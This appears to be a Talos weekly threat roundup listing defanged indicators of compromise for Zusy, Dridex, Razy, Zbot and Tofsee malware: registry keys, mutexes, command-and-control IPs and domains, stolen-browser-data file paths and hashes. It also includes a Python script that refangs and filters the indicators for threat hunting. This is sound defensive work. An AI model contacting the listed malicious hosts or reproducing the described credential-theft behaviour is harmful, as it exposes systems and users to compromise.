Today, Talos is publishing a glimpse into the most prevalent threats we've observed between July 9 and July 16. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.
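
The indicator tables in this post are flat "indicator count" lines with defanged dots, and a count only means something relative to the number of samples analysed for that family (Zusy's "7" is 7 of 11 samples; Tofsee's "267" is 267 of 273). The following Python is an added example, not code from Talos or from the roundup's accompanying JSON tooling: it parses rows in that shape (the Zusy domain and IP rows are copied from this post; the trailing CIDR row and its count are constructed), refangs them, turns the count into a prevalence over the sample total, drops hosts on an assumed noise list (ip-api.com and similar shared services, my choice, not a Talos list) and expands a /31 into the two literal addresses a log search needs. The 50 percent threshold and the noise list are assumptions to tune for your environment.

```python
import ipaddress
import re
from dataclasses import dataclass

# Constructed input: the Zusy domain and IP rows from this roundup, in the
# flattened "indicator count" shape the tables use, plus one CIDR row whose
# count is made up to exercise range handling.
SAMPLE_TABLE = """\
ip-api[.]com 7
iw[.]gamegame[.]info 7
ol[.]gamegame[.]info 7
google[.]vrthcobj[.]com 7
208[.]95[.]112[.]1 7
104[.]21[.]21[.]221 7
34[.]97[.]69[.]225 7
172[.]67[.]200[.]215 4
172[.]217[.]197[.]138/31 2
"""
SAMPLE_COUNT = 11  # "IOCs collected from dynamic analysis of 11 samples"

ROW = re.compile(r"^(?P<ioc>\S+)\s+(?P<count>\d+)$")

# Assumed noise list (my assumption, not from Talos): services the samples
# contact for geolocation, paste hosting or plain connectivity checks.
NOISY_HOSTS = {"ip-api.com", "pastebin.com", "google.com", "microsoft.com"}


@dataclass(frozen=True)
class Indicator:
    value: str         # refanged form, ready for a query
    kind: str          # "ip", "cidr" or "domain"
    count: int
    prevalence: float  # count / number of samples analysed


def refang(ioc):
    """Turn the roundup's 'a[.]b' notation back into 'a.b'."""
    return ioc.replace("[.]", ".")


def classify(value):
    if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}/\d{1,2}", value):
        return "cidr"
    if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", value):
        return "ip"
    return "domain"


def parse_table(text, sample_count):
    """Parse 'indicator count' rows; header lines and blanks carry no count."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        value = refang(m["ioc"])
        count = int(m["count"])
        rows.append(Indicator(value, classify(value), count, count / sample_count))
    return rows


def is_noisy(value):
    host = value.split("/", 1)[0]
    return any(host == n or host.endswith("." + n) for n in NOISY_HOSTS)


def hunt_list(indicators, min_prevalence=0.5):
    """Keep indicators seen in at least min_prevalence of samples and not on
    the noise list. A remaining hit is still a lead, not a verdict."""
    return [i for i in indicators
            if i.prevalence >= min_prevalence and not is_noisy(i.value)]


def expand_addresses(indicator):
    """Flatten an ip or cidr indicator into the literal addresses to search
    for; a /31 yields both of its addresses, a bare IP yields itself."""
    if indicator.kind == "domain":
        return []
    net = ipaddress.ip_network(indicator.value, strict=False)
    return [str(a) for a in net]


if __name__ == "__main__":
    for ind in hunt_list(parse_table(SAMPLE_TABLE, SAMPLE_COUNT)):
        print(f"{ind.value:28} {ind.kind:6} {ind.prevalence:.2f}")
```

Run against the Zusy rows, the list keeps the two gamegame[.]info hosts, google[.]vrthcobj[.]com and the three 7-of-11 addresses, and drops ip-api[.]com (noise) and the two low-prevalence rows. Note that google[.]vrthcobj[.]com survives the noise check because the suffix match is on the registered domain, not on the leading label; that is deliberate, since a lookalike prefix is exactly what you want to keep.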

The most prevalent threats highlighted in this roundup are:

Threat Name (Type): Description
Win.Packed.Zusy-9878432-0 (Packed): Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe". When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
Win.Packed.Dridex-9876874-1 (Packed): Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine.
Win.Trojan.Razy-9877507-0 (Trojan): Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host, encrypts the data, and sends it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence.
Win.Trojan.Zbot-9876743-0 (Trojan): Zbot, also known as Zeus, is a trojan that steals information such as banking credentials using methods including key-logging and form-grabbing.
Win.Dropper.Tofsee-9877384-0 (Dropper): Tofsee is multi-purpose malware that features multiple modules to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the overall size of the botnet under the operator's control.
Win.Malware.TinyBanker-9877962-1 (Malware): TinyBanker, also known as Zusy or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe". When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
Win.Virus.Xpiro-9877934-1 (Virus): Expiro (Xpiro) is a known file infector and information-stealer that hinders analysis with anti-debugging and anti-analysis tricks.
Win.Trojan.DarkComet-9876875-1 (Trojan): DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system.
Win.Trojan.Hupigon-9876962-0 (Trojan): Hupigon is a trojan that installs itself as a backdoor on a victim's machine.

Threat Breakdown

Win.Packed.Zusy-9878432-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 11 samples
Registry Keys (occurrences)
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\ACTIVEMOVIE 7
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\ACTIVEMOVIE\DEVENUM 64-BIT 7
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\ACTIVEMOVIE\DEVENUM 64-BIT
Value Name: Version
7
<HKLM>\SOFTWARE\CLASSES\CLSID\{1DR57FKR-8LH5-APDI-WL15-D7E36D092O6R} 7
<HKLM>\SOFTWARE\CLASSES\CLSID\{0JM26DTV-2IP2-VVKK-WQ72-M5P76R119V7P} 7
<HKLM>\SOFTWARE\CLASSES\CLSID\{3IM35UGV-5AZ2-MYEB-TR30-E5J75Y142M0Z} 7
<HKLM>\SOFTWARE\CLASSES\CLSID\{5BI26ZPE-2CT2-LOXC-YG96-J1B76T524D3T} 7
<HKLM>\SOFTWARE\CLASSES\CLSID\{5GJ77YIY-7TC3-SAVH-ZT03-P8U07A424A6C} 7
<HKLM>\SOFTWARE\CLASSES\CLSID\{5BI26ZPE-2CT2-LOXC-YG96-J1B76T524D3T}
Value Name: 1
7
<HKLM>\SOFTWARE\CLASSES\CLSID\{1DR57FKR-8LH5-APDI-WL15-D7E36D092O6R}
Value Name: 1
7
<HKLM>\SOFTWARE\CLASSES\CLSID\{3IM35UGV-5AZ2-MYEB-TR30-E5J75Y142M0Z}
Value Name: 1
7
<HKLM>\SOFTWARE\CLASSES\CLSID\{5GJ77YIY-7TC3-SAVH-ZT03-P8U07A424A6C}\650478DC7424C37C 7
<HKLM>\SOFTWARE\CLASSES\CLSID\{5GJ77YIY-7TC3-SAVH-ZT03-P8U07A424A6C}\7289246C77593EBF 7
<HKLM>\SOFTWARE\CLASSES\CLSID\{5GJ77YIY-7TC3-SAVH-ZT03-P8U07A424A6C}\650478DC7424C37C
Value Name: 2
7
<HKLM>\SOFTWARE\CLASSES\CLSID\{5GJ77YIY-7TC3-SAVH-ZT03-P8U07A424A6C}\7289246C77593EBF
Value Name: 2
7
<HKLM>\SOFTWARE\CLASSES\CLSID\{0JM26DTV-2IP2-VVKK-WQ72-M5P76R119V7P}
Value Name: 1
7
<HKLM>\SOFTWARE\CLASSES\CLSID\{5GJ77YIY-7TC3-SAVH-ZT03-P8U07A424A6C}\650478DC7424C37C
Value Name: 1
7
<HKLM>\SOFTWARE\CLASSES\CLSID\{5GJ77YIY-7TC3-SAVH-ZT03-P8U07A424A6C}\7289246C77593EBF
Value Name: 1
7
Mutexes (occurrences)
eed3bd3a-a1ad-4e99-987b-d7cb3fcfa7f0 - S-1-5-18 7
Global\a0e6fb61-e468-11eb-b5f8-00501e3ae7b6 1
Global\a2051d61-e468-11eb-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware (occurrences). Does not indicate maliciousness.
208[.]95[.]112[.]1 7
104[.]21[.]21[.]221 7
34[.]97[.]69[.]225 7
172[.]67[.]200[.]215 4
Domain Names contacted by malware (occurrences). Does not indicate maliciousness.
ip-api[.]com 7
iw[.]gamegame[.]info 7
ol[.]gamegame[.]info 7
google[.]vrthcobj[.]com 7
Files and/or directories created (occurrences)
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\cookies.sqlite.tmp 7
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\cookies.sqlite.tmp-shm 7
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\cookies.sqlite.tmp-wal 7
%LOCALAPPDATA%\Google\Chrome\User Data\Default\Cookies.tmp 7
%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data.tmp 7
%TEMP%\axhub.dat 7
%TEMP%\axhub.dll 7
%TEMP%\api-ms-win-core-namedpipe-l1-1-0.dll 7
%TEMP%\api-ms-win-core-string-l1-1-0.dll 7
%TEMP%\ 1
%TEMP%\ 1

File Hashes

01c89872ebd48f97e9161564183cea49dfb69cc90b693068729894eddd066561
4420e1edcb7735245bd485c772a2c388c1d85ba801b9373b89307977abae7a0d
64193e3cd582e158d2533a6c7fd115b1b76d521e44f42aaa545375601fcbcfc0
673453fec6e11175bf0a749c94594c22a886d2f287e9648b51aa305b17109ffd
7010d5ddded81107f17f04b164bdcf1d3f9cd3e84745f711ad5178356c13bff7
90a1aa811661bf8575c63069aa52f5ab6b691307a78a43668caad53d7cfa74af
948bd9774b0dfad1762f459a078f55426780b722585aa701941e95b188a552de
9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c
a0836b3ace14b2e4ea8dde7270076bc2c9370c8c4be97258d5aa8c9bdf6b7b4a
b5836dfd74e9e193cb8b3ee99d34f6b93ff5b88fecdc8f0b55928407bd0af376
b92a71d8ea301e1d28e35cfe737783942348a27614fbdf288e489e0a573d384b

Coverage

Product (protection)
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Dridex-9876874-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys (occurrences)
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: trkcore
26
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
26
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0
Value Name: CheckSetting
26
Mutexes (occurrences)
<random, matching [A-Z0-9]{10}> 26
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_sr.db!dfMaintainer 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_2560.db!dfMaintainer 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_wide_alternate.db!dfMaintainer 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:iconcache_idx.db!rwReaderRefs 1
\Sessions\2\BaseNamedObjects\FileZilla3DragDropExtMutex 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_wide.db!dfMaintainer 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_48.db!dfMaintainer 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!ThumbnailCacheInit 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_256.db!dfMaintainer 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_96.db!dfMaintainer 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!rwWriterMutex 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_custom_stream.db!dfMaintainer 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_exif.db!dfMaintainer 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!rwReaderRefs 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_1920.db!dfMaintainer 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_32.db!dfMaintainer 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_1280.db!dfMaintainer 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_16.db!dfMaintainer 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_768.db!dfMaintainer 1
IP Addresses contacted by malware (occurrences). Does not indicate maliciousness.
172[.]217[.]12[.]142 19
104[.]23[.]98[.]190 16
104[.]23[.]99[.]190 10
172[.]217[.]197[.]138/31 7
23[.]3[.]13[.]153 6
72[.]21[.]81[.]240 5
172[.]217[.]197[.]102 5
172[.]217[.]197[.]100/31 5
172[.]217[.]197[.]113 4
23[.]3[.]13[.]154 3
142[.]250[.]73[.]238 2
172[.]217[.]10[.]110 1
172[.]217[.]11[.]46 1
172[.]217[.]165[.]142 1
Domain Names contacted by malware (occurrences). Does not indicate maliciousness.
pastebin[.]com 26
w[.]google[.]com 26
www3[.]l[.]google[.]com 21
cs11[.]wpc[.]v0cdn[.]net 5
www[.]kvngsfgvwj[.]com 1
www[.]k84fhimmv0[.]com 1
www[.]rpglh3jpai[.]com 1
www[.]zkyrdwtrmd[.]com 1
www[.]oln18ksf8x[.]com 1
www[.]bdysup3xgi[.]com 1
www[.]mdz3krbob8[.]com 1
www[.]gmijo75cvt[.]com 1
www[.]avuuk3rnjf[.]com 1
www[.]keh6wi3alz[.]com 1
www[.]icmderuwdg[.]com 1
www[.]rjqkbe6dlg[.]com 1
www[.]k3g9hw3wmc[.]com 1
www[.]q6mrjuq0xp[.]com 1
www[.]o493fqbd2a[.]com 1
www[.]tlf4u71kzi[.]com 1
www[.]venjhmoxel[.]com 1
www[.]kunx1klqyn[.]com 1
www[.]a2lewtz3n4[.]com 1
www[.]1jdy1tyj8q[.]com 1
www[.]ty96upgczj[.]com 1

*See JSON for more IOCs

Files and/or directories created (occurrences)
<malware cwd>\old_<malware exe name> (copy) 25
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\LockScreen___1024_0768_notdimmed.jpg (copy) 1
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\~ockScreen___1024_0768_notdimmed.tmp 1
%LOCALAPPDATA%\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl 1

File Hashes
*See JSON for more IOCs

Coverage

Product (protection)
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.Razy-9877507-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys (occurrences)
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\\SHELL 1
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\\SHELL
Value Name: KnownFolderDerivedFolderType
1
Mutexes (occurrences)
4pC39Ev2yuzFY8izw76DGDJR 26
IP Addresses contacted by malware (occurrences). Does not indicate maliciousness.
185[.]10[.]68[.]220 10
91[.]211[.]89[.]29 9
185[.]10[.]68[.]123 8
Domain Names contacted by malware (occurrences). Does not indicate maliciousness.
eu[.]minerpool[.]pw 26

File Hashes
*See JSON for more IOCs

Coverage

Product (protection)
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.Zbot-9876743-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 22 samples
Registry Keys (occurrences)
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 22
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Policies
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Adobe
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Wow6432Node
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: ODBC
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Mozilla
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Macromedia
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: JavaSoft
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Microsoft
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Classes
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: AppDataLow
1
Mutexes (occurrences)
88DBA0C4E2AF76447DF43D1E31331A3DDFD6B146 22
2B9A8C67DC1B4C75448E49FE312F9FA854FD1102 1
E3760AA3B91957B7BE56AB5AC8AFF95554FD1102 1
5648521BBE38B9788AB349E9232C1AB654FD1102 1
2A705A1862097DD390FDA2FBE22F00567AC7CB39 1
3B6F290A1D83B4CB9B3A36F3D63FAE8B47169355 1
A3CCEECBA73C117B92C4877B844CC3974D6D40C8 1
0164C866F1068DCFF562B6EA0CB17A48535C69CB 1
11D01601084BA8AB2A92ABD619F391D557019107 1
C9E9340333EA7181CFEB4456FAFB69814606317A 1
201E8A97DDFB1D5AD324645228B94C3924F9E955 1
71F44DF32E1155895791B8E6BA7D7C067C48096D 1
ABCF10EB30ED5E962F5F28C6947B55F01B3157F6 1
D8C7D9B0550FF5896AEA9BBADB3D321D10AADC52 1
ABCF10EB30ED5E962F5F28C6947B55F02F60953F 1
E3760AA3B91957B7BE56AB5AC8AFF9557015B7D3 1
32231A5A07A67564ECECF990FF4314D57205F37E 1
C88FE2FDBDA7F4FD2943E95836BD26AD6A669145 1
8AE738634DC65D6F98BC08191C57D05F5758B3FA 1
C9E9340333EA7181CFEB4456FAFB698142476F9F 1
524B500CCA29D0C6B2B9C487658AA84E4934B9F9 1
IP Addresses contacted by malware (occurrences). Does not indicate maliciousness.
52[.]185[.]71[.]28 13
52[.]137[.]90[.]34 11
65[.]55[.]50[.]189 1
134[.]170[.]58[.]222 1
Domain Names contacted by malware (occurrences). Does not indicate maliciousness.
windowsupdate[.]microsoft[.]com 16
redir[.]update[.]microsoft[.]com[.]nsatc[.]net 13
www[.]update[.]microsoft[.]com[.]nsatc[.]net 3
f58dfc22[.]mjhk-wjty[.]info 1
bd5a7c4b[.]mjhk-wjty[.]info 1
57360501[.]bthmj-nty[.]info 1
8cbeafbf[.]bthmj-nty[.]info 1
8d0dc390[.]bthmj-nty[.]info 1
19df0b48[.]bthmj-nty[.]info 1
8b4c429b[.]bthmj-nty[.]info 1
7e22d9dd[.]mjhk-wjty[.]info 1
bf1c3bad[.]mjhk-wjty[.]info 1
3c6b6823[.]mjhk-wjty[.]info 1
9c6b34a9[.]mjhk-wjty[.]info 1
7e4069b8[.]bthmj-nty[.]info 1
347d9155[.]mjhk-wjty[.]info 1
3277f004[.]mjhk-wjty[.]info 1
61659270[.]mjhk-wjty[.]info 1
f5959882[.]bthmj-nty[.]info 1
547b501f[.]mjhk-wjty[.]info 1
66a1afcf[.]mjhk-wjty[.]info 1
b26d6ace[.]mjhk-wjty[.]info 1
545f31f8[.]mjhk-wjty[.]info 1
5bb71283[.]bthmj-nty[.]info 1
3a87509f[.]mjhk-wjty[.]info 1

*See JSON for more IOCs

Files and/or directories created (occurrences)
%APPDATA%\D6B146.exe 22
%APPDATA%\<random, matching [A-Fa-z0-9]{5,8}.exe 20

File Hashes

Coverage

Product (protection)
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Dropper.Tofsee-9877384-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 273 samples
Registry Keys (occurrences)
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 271
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
267
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 75
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
75
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
75
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
75
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
75
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
75
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
75
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
75
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
26
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\zsgmltzo
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ZSGMLTZO
Value Name: Type
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ZSGMLTZO
Value Name: Start
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ZSGMLTZO
Value Name: ErrorControl
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ZSGMLTZO
Value Name: DisplayName
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ZSGMLTZO
Value Name: WOW64
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ZSGMLTZO
Value Name: ObjectName
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ZSGMLTZO
Value Name: Description
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ZSGMLTZO 17
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\rkyedlrg
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG
Value Name: Type
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG
Value Name: ErrorControl
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG
Value Name: DisplayName
15
IP Addresses contacted by malware (occurrences). Does not indicate maliciousness.
43[.]231[.]4[.]6/31 270
176[.]111[.]174[.]19 269
95[.]216[.]206[.]250 269
162[.]244[.]34[.]228 267
176[.]111[.]174[.]126 267
176[.]9[.]102[.]196 267
136[.]243[.]18[.]158 267
176[.]111[.]174[.]124/31 267
172[.]217[.]165[.]132 216
31[.]13[.]65[.]174 210
65[.]9[.]146[.]69 123
40[.]93[.]207[.]0/31 104
142[.]250[.]72[.]115 90
31[.]13[.]65[.]52 79
40[.]76[.]4[.]15 61
216[.]239[.]36[.]126 57
40[.]112[.]72[.]205 54
40[.]113[.]200[.]201 53
211[.]231[.]108[.]46/31 53
104[.]47[.]53[.]36 52
104[.]215[.]148[.]63 51
163[.]172[.]32[.]74 49
40[.]93[.]212[.]0 44
23[.]64[.]110[.]75 43
99[.]181[.]79[.]1 40

*See JSON for more IOCs

Domain Names contacted by malware (occurrences). Does not indicate maliciousness.
microsoft-com[.]mail[.]protection[.]outlook[.]com 272
microsoft[.]com 272
lazystax[.]ru 272
249[.]5[.]55[.]69[.]in-addr[.]arpa 271
249[.]5[.]55[.]69[.]bl[.]spamcop[.]net 269
249[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 269
249[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 269
249[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 269
249[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 269
www[.]google[.]com 269
www[.]instagram[.]com 202
authserver[.]mojang[.]com 129
accounts[.]snapchat[.]com 97
i[.]instagram[.]com 79
b[.]i[.]instagram[.]com 71
app[.]snapchat[.]com 57
sso[.]godaddy[.]com 52
ip[.]pr-cy[.]hacklix[.]com 49
auth[.]api[.]np[.]ac[.]playstation[.]net 43
video-weaver[.]hel01[.]hls[.]ttvnw[.]net 41
native-ps3[.]np[.]ac[.]playstation[.]net 27
csla[.]np[.]community[.]playstation[.]net 26
www[.]google[.]co[.]uk 24
www[.]google[.]fr 18
yandex[.]com 18

*See JSON for more IOCs

Files and/or directories created (occurrences)
%SystemRoot%\SysWOW64\config\systemprofile 271
%SystemRoot%\SysWOW64\config\systemprofile:.repos 271
%TEMP%\<random, matching '[a-z]{8}'>.exe 257
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 75
%System32%\<random, matching '[a-z]{7,8}'>\<random, matching '[a-z]{6,8}'>.exe (copy) 25
%TEMP%\<random, matching '[a-z]{4,9}'>.exe 18
%SystemRoot%\SysWOW64\zsgmltzo 17
%SystemRoot%\SysWOW64\ohvbaiod 15
%SystemRoot%\SysWOW64\rkyedlrg 15
%SystemRoot%\SysWOW64\qjxdckqf 13
%SystemRoot%\SysWOW64\kdrxwekz 13
%SystemRoot%\SysWOW64\exlrqyet 13
%SystemRoot%\SysWOW64\piwcbjpe 12
%SystemRoot%\SysWOW64\gzntsagv 12
%SystemRoot%\SysWOW64\dwkqpxds 12
%SystemRoot%\SysWOW64\ibpvucix 11
%SystemRoot%\SysWOW64\cvjpowcr 11
%SystemRoot%\SysWOW64\unbhgouj 11
%SystemRoot%\SysWOW64\wpdjiqwl 10
%SystemRoot%\SysWOW64\athnmuap 10
%SystemRoot%\SysWOW64\fymsrzfu 10
%SystemRoot%\SysWOW64\buionvbq 10
%System32%\kvmtql\avczyvrs.exe (copy) 1

File Hashes

00acbc3e3a99090c43f2338e905afa15921e87a2d3850d21350e131618f0764d
00d14683fdfbad03ef22a93e8f873a4e3917fda01ea3cd6e23b8e4f93e0021a2
02aa78c912e1a45519b9bb1599a6cc020d9947baffea225eb6d0b418f94c921f
033d5ccd658339872910f9f05126c25370f15df7d7305890d0927f41ca2b7562
062c68419f4f849f514a93bd32c0bf612b93789e1e8db5f45ceb710b63b0f16f
06703e4b14524f14e3a2a1a4de33b87c1517e90233fe2e71f0303c4f983b9d5b
068bf99f5ac3d076a4e8317701b0b638c44afdeb5d57c30349e8614babb13635
